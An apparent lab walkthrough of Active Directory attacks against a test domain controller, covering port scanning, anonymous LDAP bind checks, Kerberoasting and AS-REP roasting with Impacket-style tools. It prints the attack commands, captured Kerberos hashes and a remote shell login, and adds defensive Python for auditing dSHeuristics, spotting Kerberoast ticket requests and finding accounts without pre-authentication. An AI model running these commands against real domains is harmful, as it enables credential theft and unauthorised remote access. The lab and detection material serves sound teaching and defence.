There are three VMs in front of us: DC 2019, CLIENT, and Kali.
Let’s do a port scan on the DC.
nmap -p- -A -T4 192.168.100.101
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-01 14:24 EDT
Nmap scan report for 192.168.100.101
Host is up (0.00093s latency).
Not shown: 65515 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-09-01 18:30:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: alixan.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds (workgroup: alixan)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: alixan.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49687/tcp open msrpc Microsoft Windows RPC
60646/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:AE:39:D6 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|2012|Vista|2008|7 (96%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows Server 2016 (96%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (92%), Microsoft Windows Server 2012 R2 (88%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: SRVDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h24m35s, deviation: 4h02m29s, median: 4m34s
|_nbstat: NetBIOS name: SRVDC, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:ae:39:d6 (Oracle VirtualBox virtual NIC)
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: SRVDC
| NetBIOS computer name: SRVDC\x00
| Domain name: alixan.local
| Forest name: alixan.local
| FQDN: SRVDC.alixan.local
|_ System time: 2021-09-01T11:31:34-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-09-01T18:31:33
|_ start_date: 2021-09-01T17:33:59
TRACEROUTE
HOP RTT ADDRESS
1 0.93 ms 192.168.100.101
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 188.18 seconds
Most of the time we need a user account to do a good enumeration. However, in some scenarios you may find that anonymous LDAP binds are allowed.
PS: to build this into the lab, open ADSI Edit, browse to Services > Windows NT > Directory Service, and set the dSHeuristics attribute to 000002.
After this change, ANONYMOUS LOGON should be added (granted access) if it is not already present in the system.
Actually, what you have built is a vulnerable lab environment. Now let's check whether anonymous binds are allowed or not. ldapsearch, which is installed by default, can be used for this: the -x option selects simple authentication, and with no bind DN given it attempts an anonymous bind. Under normal conditions, when anonymous logon is not permitted, it produces output like the following.
ldapsearch -x -h 192.168.100.101 -b "DC=alixan,DC=local"
# extended LDIF
# LDAPv3
# base <> (default) with scope subtree
# filter: (objectclass=*)
# requesting: ALL
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C0909AF, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v3839
# numResponses: 1
Let’s try a few more with another tool, windapsearch.
python3 windapsearch.py -U --dc-ip 192.168.100.101
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 192.168.100.101
[+] Getting defaultNamingContext from Root
[+] Found: DC=alixan,DC=local
[+] Attempting bind
[+] …success! Binded as:
[+] None
[+] Enumerating all AD users
[!] Error retrieving users
[!] {'desc': 'Operations error', 'info': '000004DC: LdapErr: DSID-0C0909AF, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v3839'}
This is what an anonymous bind attempt looks like: the bind itself is accepted, but the user query is refused until a real bind is completed.
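The two outputs above (ldapsearch and windapsearch) are the "anonymous access is blocked" case, which is the default on a DC. As an added audit helper, not part of the original post or of either tool, the following Python checks both sides of that picture: whether a dSHeuristics value enables anonymous LDAP operations (the 7th character, fLDAPBlockAnonOps, must be '2'; absent characters count as '0'), and whether the output of an unauthenticated query shows the bind-required refusal or actual directory entries. The sample outputs embedded below are constructed; the refused one mirrors the page, the allowed one is what entries coming back would look like.

```python
import re

# dSHeuristics is a positional string; the 7th character (fLDAPBlockAnonOps)
# controls anonymous LDAP operations. '2' permits them, '0' or an absent
# character blocks everything except the rootDSE bind (MS-ADTS).
ANON_OPS_POSITION = 7


def anonymous_ldap_ops_enabled(dsheuristics):
    """Return True when the dSHeuristics value enables anonymous LDAP operations.
    Characters missing from the end of the string count as '0'."""
    value = (dsheuristics or "").strip()
    if len(value) < ANON_OPS_POSITION:
        return False
    return value[ANON_OPS_POSITION - 1] == "2"


# Error text a Windows DC returns when an unauthenticated query is refused;
# it appears in both the ldapsearch and the windapsearch output above.
BIND_REQUIRED = re.compile(r"successful bind must be completed", re.IGNORECASE)


def classify_anonymous_query(output):
    """Classify the output of an unauthenticated LDAP query against a DC.

    'blocked' - the DC answered with the bind-required error (expected default)
    'allowed' - directory entries came back without credentials (finding)
    'unknown' - neither pattern found, inspect by hand
    """
    if BIND_REQUIRED.search(output):
        return "blocked"
    if re.search(r"^dn: .+", output, re.MULTILINE):
        return "allowed"
    return "unknown"


# Constructed samples: the first mirrors the refused query shown above, the
# second is what a query returning entries would look like.
BLOCKED_OUTPUT = """# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C0909AF, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v3839
"""

ALLOWED_OUTPUT = """# alixan.local
dn: DC=alixan,DC=local
objectClass: domainDNS
dc: alixan
"""


def audit(dsheuristics, query_output):
    """Combine both checks into one finding string for a report."""
    if anonymous_ldap_ops_enabled(dsheuristics):
        cfg = "dSHeuristics permits anonymous ops"
    else:
        cfg = "dSHeuristics blocks anonymous ops"
    return "%s; anonymous query %s" % (cfg, classify_anonymous_query(query_output))


if __name__ == "__main__":
    print(audit("0000002", ALLOWED_OUTPUT))
    print(audit("", BLOCKED_OUTPUT))
```

Read the dSHeuristics value from CN=Directory Service,CN=Windows NT,CN=Services in the Configuration partition and feed it to audit() together with a captured ldapsearch run; a result of "permits ... allowed" is the configuration this lab deliberately creates and the one to revert in production.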
If we want rough information about the domain, the nmap output already gives us the answer; a simple scan with the LDAP NSE scripts, like the one below, is enough.
nmap -p 389 --script ldap-* 192.168.100.101
Kerberoasting is an attack technique used to recover the passwords of service accounts by cracking them offline. It can be used to gain access to services, to raise rights and privileges on the target system, and to obtain persistence on it.
python3 windapsearch.py -U --user-spns --dc-ip 192.168.100.101 -u alice@alixan.local -p Password
[+] Using Domain Controller at: 192.168.100.101
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=alixan,DC=local
[+] Attempting bind
[+] …success! Binded as:
[+] u:alixan\alice
[+] Enumerating all AD users
[+] Found 8 users
cn: Administrator
cn: Guest
cn: DefaultAccount
cn: krbtgt
cn: Alice Princess
userPrincipalName: alice@alixan.local
cn: Shrek Shrek
userPrincipalName: shrek@alixan.local
cn: Mark Man
userPrincipalName: mark@alixan.local
cn: SQL Database
userPrincipalName: sqldatabase@alixan.local
[+] Attempting to enumerate all User objects with SPNs
[+] Found 1 Users with SPNs:
CN=SQL Database,CN=Users,DC=alixan,DC=local
[*] Bye!
Yes, we found a user account with an SPN set.
# python3 sss -request -dc-ip 192.168.100.101 alixan.local/administrator
Impacket v0.9.24.dev1+20210827.162957.5aa97fa7 - Copyright 2021 SecureAuth Corporation
Password:
ServicePrincipalName                 Name         MemberOf                                                    PasswordLastSet             LastLogon  Delegation
-----------------------------------  -----------  ----------------------------------------------------------  --------------------------  ---------  ----------
SRVDC/sqldatabase.alixan.local:1337  sqldatabase  CN=Group Policy Creator Owners,CN=Users,DC=alixan,DC=local  2021-09-01 13:45:05.665182  <never>
$krb5tgs$23$*sqldatabase$alixan.LOCAL$alixan.local/sqldatabase*$2d903a5247d3c1fef115526868e07924$...
You can crack the hash with John, but I don't, because I know my password. Now we can log in.
# python3 ddd.py alixan/administrator:Password@192.168.100.101
Impacket v0.9.24.dev1+20210827.162957.5aa97fa7 - Copyright 2021 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
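The ticket request above leaves a trace on the DC: a Security event 4769 (Kerberos service ticket requested) for the sqldatabase SPN, with ticket encryption type 0x17 (RC4-HMAC, which is what a $krb5tgs$23$ hash is built from). As an added detection example, not code from the original post or from Impacket, the Python below runs a simple Kerberoast check over constructed 4769 records and, from account records shaped like the windapsearch output, lists SPN accounts that sit in privileged groups (the lab's sqldatabase is a member of Group Policy Creator Owners). Names mirror the lab; the IP addresses, the event sequence and the PRIVILEGED_GROUPS list are assumptions made for the example.

```python
from collections import defaultdict

RC4_HMAC = "0x17"  # TicketEncryptionType for RC4-HMAC

# Constructed sample of Security event 4769 records, reduced to the fields the
# check needs. Account and service names mirror the lab above; the addresses
# and the sequence are made up.
SAMPLE_4769 = [
    {"TargetUserName": "administrator@ALIXAN.LOCAL", "ServiceName": "sqldatabase",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "192.168.100.50"},
    {"TargetUserName": "administrator@ALIXAN.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "192.168.100.50"},
    {"TargetUserName": "alice@ALIXAN.LOCAL", "ServiceName": "SRVDC$",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "192.168.100.20"},
    {"TargetUserName": "mark@ALIXAN.LOCAL", "ServiceName": "sqldatabase",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "192.168.100.20"},
    {"TargetUserName": "alice@ALIXAN.LOCAL", "ServiceName": "sqldatabase",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "192.168.100.20"},
]


def is_user_service(service_name):
    """Tickets for user-account SPNs are the ones that can be cracked offline;
    machine accounts end in '$' and krbtgt tickets are ordinary TGT traffic."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def suspicious_tgs_requests(events):
    """Return 4769 events that look like a Kerberoast ticket request:
    successful, RC4-encrypted, for a user (not machine) service account."""
    return [
        e for e in events
        if e["Status"] == "0x0"
        and e["TicketEncryptionType"] == RC4_HMAC
        and is_user_service(e["ServiceName"])
    ]


def group_by_requester(events):
    """Map (requesting user, source IP) -> sorted list of targeted services,
    so that one principal pulling tickets for many SPNs stands out."""
    grouped = defaultdict(set)
    for e in suspicious_tgs_requests(events):
        grouped[(e["TargetUserName"], e["IpAddress"])].add(e["ServiceName"])
    return {key: sorted(services) for key, services in grouped.items()}


# Constructed account records in the shape of the tool output above.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "sqldatabase",
     "servicePrincipalName": ["SRVDC/sqldatabase.alixan.local:1337"],
     "memberOf": ["CN=Group Policy Creator Owners,CN=Users,DC=alixan,DC=local"]},
    {"sAMAccountName": "alice", "servicePrincipalName": [], "memberOf": []},
]

# Assumed list of groups worth flagging; extend it for your own tier model.
PRIVILEGED_GROUPS = ("Domain Admins", "Enterprise Admins", "Administrators",
                     "Group Policy Creator Owners", "Account Operators")


def privileged_spn_accounts(accounts):
    """User accounts that both carry an SPN and sit in a privileged group:
    the ones where a cracked service password matters most."""
    hits = []
    for account in accounts:
        if not account["servicePrincipalName"]:
            continue
        # first RDN of each memberOf DN, e.g. 'CN=Group Policy Creator Owners'
        groups = [dn.split(",")[0].split("=", 1)[1] for dn in account["memberOf"]]
        if any(g in PRIVILEGED_GROUPS for g in groups):
            hits.append(account["sAMAccountName"])
    return hits


if __name__ == "__main__":
    for key, services in group_by_requester(SAMPLE_4769).items():
        print("RC4 service tickets", key, "->", services)
    print("privileged SPN accounts:", privileged_spn_accounts(SAMPLE_ACCOUNTS))
```

Filtering on RC4 catches the default tooling behaviour, but tickets can also be requested with AES, so in production tie the rule to the number of distinct user SPNs one requester pulls in a short window as well. On the prevention side, the second function points at the fix: long random passwords (or group managed service accounts) for SPN accounts, and no privileged group membership for them.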
AS-REP Roasting Attack
During Kerberos pre-authentication the client encrypts a timestamp with the user's key, and the DC decrypts and checks it before issuing anything. This is what blocks offline brute force. When pre-authentication is not required for an account, that step is skipped and the AS-REP it receives can be attacked offline.
python3 jjj.py alixan.local/administrator -request
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation
Password:
Name           MemberOf                                     PasswordLastSet             LastLogon  UAC
-------------  -------------------------------------------  --------------------------  ---------  --------
Administrator  CN=Adminstrator,CN=Users,DC=alixan,DC=local  2021-07-21 06:45:46.182240  <never>    0x410200
$krb5asrep$23$Administrator@alixan.LOCAL:7f9c1e197d5e5e4b5944e68427c83d71$fbc33d008b8564a4a69c06be4dbddaba01a65b316a94102df96b59bc1bbeb7c99022e4f2229721010f22032abbf42e9dcda42352eb140bf2998b6dfcd5dfb9d25089e3a1cbbbd29ee9ad84523bcf68541c965d4c79589492c93b33b74395b427e9063be7b9e507d51cb02911e37d38013794f6381fd47ecd3180d6a50a15d297925c8d9615829ff49a5644c93b72c0674f700d1cce27f39d704de0d436a4b644559fd7636db8c9ce9cee2f86ccab8e2fdd7afd1aa76406120a7df2a602f722d0d2790666fdbd20f9c4316186f9783bce61807c2bd9dfa07bf965330ec98ce3da8aa55f1d27cbed996d46
You can crack the hash with John.
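The UAC column above is the tell: 0x410200 is NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH, and the last bit is what let the tool obtain a crackable AS-REP for Administrator. As an added example, not code from the original post or from Impacket, the Python below decodes a userAccountControl value into its flag names and lists the enabled accounts that have pre-authentication disabled, which is the audit a defender runs to find and fix this. The Administrator value comes from the output above; the other sample accounts are constructed.

```python
# userAccountControl bit flags (Microsoft documentation). Only the commonly
# seen bits are listed; unknown bits are reported by value.
UAC_FLAGS = {
    0x0001: "SCRIPT",
    0x0002: "ACCOUNTDISABLE",
    0x0008: "HOMEDIR_REQUIRED",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0040: "PASSWD_CANT_CHANGE",
    0x0080: "ENCRYPTED_TEXT_PWD_ALLOWED",
    0x0100: "TEMP_DUPLICATE_ACCOUNT",
    0x0200: "NORMAL_ACCOUNT",
    0x0800: "INTERDOMAIN_TRUST_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x20000: "MNS_LOGON_ACCOUNT",
    0x40000: "SMARTCARD_REQUIRED",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
    0x4000000: "PARTIAL_SECRETS_ACCOUNT",
}
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000


def parse_uac(value):
    """Accept the integer LDAP stores or the '0x410200' string the tool prints."""
    if isinstance(value, int):
        return value
    return int(str(value).strip(), 0)


def decode_uac(value):
    """Return the sorted flag names set in a userAccountControl value."""
    uac = parse_uac(value)
    names = [name for bit, name in UAC_FLAGS.items() if uac & bit]
    leftover = uac & ~sum(UAC_FLAGS)  # bits not covered by the table
    if leftover:
        names.append("UNKNOWN_0x%X" % leftover)
    return sorted(names)


def asrep_roastable(accounts):
    """Enabled accounts with DONT_REQ_PREAUTH set: these get an AS-REP without
    proving knowledge of the password first, so the reply can be cracked offline."""
    hits = []
    for account in accounts:
        uac = parse_uac(account["userAccountControl"])
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE:
            hits.append(account["sAMAccountName"])
    return hits


# Constructed sample: the Administrator value is the 0x410200 printed above;
# alice is an ordinary user and shrek a disabled account with the flag set.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "Administrator", "userAccountControl": "0x410200"},
    {"sAMAccountName": "alice", "userAccountControl": 0x10200},
    {"sAMAccountName": "shrek", "userAccountControl": 0x400202},
]

if __name__ == "__main__":
    print(decode_uac("0x410200"))
    print(asrep_roastable(SAMPLE_ACCOUNTS))
```

Feed it the sAMAccountName and userAccountControl attributes of every user object and clear the "Do not require Kerberos preauthentication" option on whatever it lists; on the DC, a 4768 event with Pre-Authentication Type 0 for such an account is the corresponding detection.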
References: https://awakesecurity.com/blog/kerberoasting-threat-hunting-for-active-directory-attacks/